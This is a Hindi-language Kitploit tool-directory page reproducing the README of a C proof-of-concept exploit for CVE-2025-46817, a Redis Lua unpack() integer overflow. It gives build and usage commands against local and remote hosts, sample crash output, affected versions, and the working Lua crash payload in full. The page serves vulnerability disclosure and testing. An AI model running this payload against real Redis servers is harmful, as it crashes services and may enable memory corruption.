Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-46817-PoC — CVE-2025-46817 के लिए C-आधारित एक्सप्लॉइट, एक Redis पूर्णांक ओवरफ्लो भेद्यता, जो क्रैश डिटेक्शन और Lua unpack() पेलोड के माध्यम से संभावित RCE को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
भेद्यता विश्लेषणशोषणफज़िंगपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

CVE-2025-46817 के लिए C-आधारित एक्सप्लॉइट, एक Redis पूर्णांक ओवरफ्लो भेद्यता, जो क्रैश डिटेक्शन और Lua unpack() पेलोड के माध्यम से संभावित RCE को सक्षम बनाता है।

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-46817 Redis पूर्णांक अतिप्रवाह शोषण

Banner Language Platform

Redis पूर्णांक अतिप्रवाह भेद्यता के लिए CVE-2025-46817 शोषण का एक हल्का C कार्यान्वयन।

🚀 विशेषताएँ

  • हल्का: एकल C फ़ाइल, hiredis के अलावा कोई बाहरी निर्भरता नहीं
  • तेज़: अधिकतम प्रदर्शन के लिए मूल संकलन
  • रंगीन आउटपुट: सुंदर टर्मिनल रंग और आइकन
  • क्रैश पहचान: स्वचालित रूप से सर्वर क्रैश का पता लगाता है
  • संस्करण जाँच: भेद्य Redis संस्करणों की पहचान करता है
  • टाइमआउट समर्थन: कॉन्फ़िगर करने योग्य कनेक्शन टाइमआउट

📋 आवश्यकताएँ

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 संकलन

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 उपयोग

मूल उपयोग

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

दूरस्थ लक्ष्य

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

कमांड लाइन विकल्प

root@kitploit:~
-H <host>    Redis सर्वर होस्ट (आवश्यक)
-P <port>    Redis सर्वर पोर्ट (आवश्यक)  
-t <timeout> कनेक्शन टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
-h           सहायता संदेश दिखाएँ

📊 उदाहरण आउटपुट

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    CVE-2025-46817 शोषण उपकरण
                   पूर्णांक अतिप्रवाह -> RCE श्रृंखला
                   एक्सेस -> https://pwnbuffer.org/

    लेखक: Slayerkkk
    लक्ष्य: Redis <= 8.2.1
    प्रकार: मेमोरी भ्रष्टाचार -> कोड निष्पादन

ℹ️ 127.0.0.1:6379 से कनेक्शन का परीक्षण...
✅ कनेक्शन सफल
ℹ️ Redis संस्करण: 8.2.1
❌ भेद्य - संस्करण <= 8.2.1
ℹ️ Lua स्क्रिप्टिंग का परीक्षण...
✅ Lua सक्षम (1+1=2)

🚀 शोषण शुरू करना
==================================================
💀 शोषण पेलोड निष्पादित करना...
    पेलोड: unpack() के माध्यम से पूर्णांक अतिप्रवाह
💥 सर्वर क्रैश - कनेक्शन खो गया!

📊 शोषण परिणाम
==============================
  💥 स्थिति: क्रैश (2.34s)

💀 शोषण सफल - सर्वर क्रैश!
   CVE-2025-46817 भेद्यता की पुष्टि हुई

🛡️ प्रभावित संस्करण

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 तकनीकी विवरण

भेद्यता

शोषण Redis के Lua unpack() फ़ंक्शन कार्यान्वयन (luaB_unpack) में पूर्णांक अतिप्रवाह को लक्षित करता है। जब विशिष्ट पैरामीटरों के साथ कॉल किया जाता है, तो हस्ताक्षरित पूर्णांक अंकगणित अतिप्रवाहित हो जाता है, जिससे Redis बड़ी संख्या में रिटर्न मानों को मटेरियलाइज़ करने का प्रयास करता है।

शोषण पेलोड

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

प्रभाव

  • सर्वर क्रैश: तत्काल सेवा से इनकार
  • मेमोरी भ्रष्टाचार: हीप/स्टैक भ्रष्टाचार
  • संभावित RCE: मेमोरी भ्रष्टाचार कोड निष्पादन की ओर ले जा सकता है

🎯 पहचान परिणाम

उपकरण इनमें से एक स्थिति की रिपोर्ट करता है:

  • ✅ survived: सर्वर ने पेलोड को संभाला (संभवतः पैच किया गया)
  • 💥 crashed: सर्वर क्रैश (भेद्य)
  • ⚠️ timeout: सर्वर हैंग (संभवतः भेद्य)
  • ❌ error: अन्य त्रुटि हुई

🙏 श्रेय

लेखक: Slayerkkk
वेबसाइट: https://pwnbuffer.org

टूल डाउनलोड करें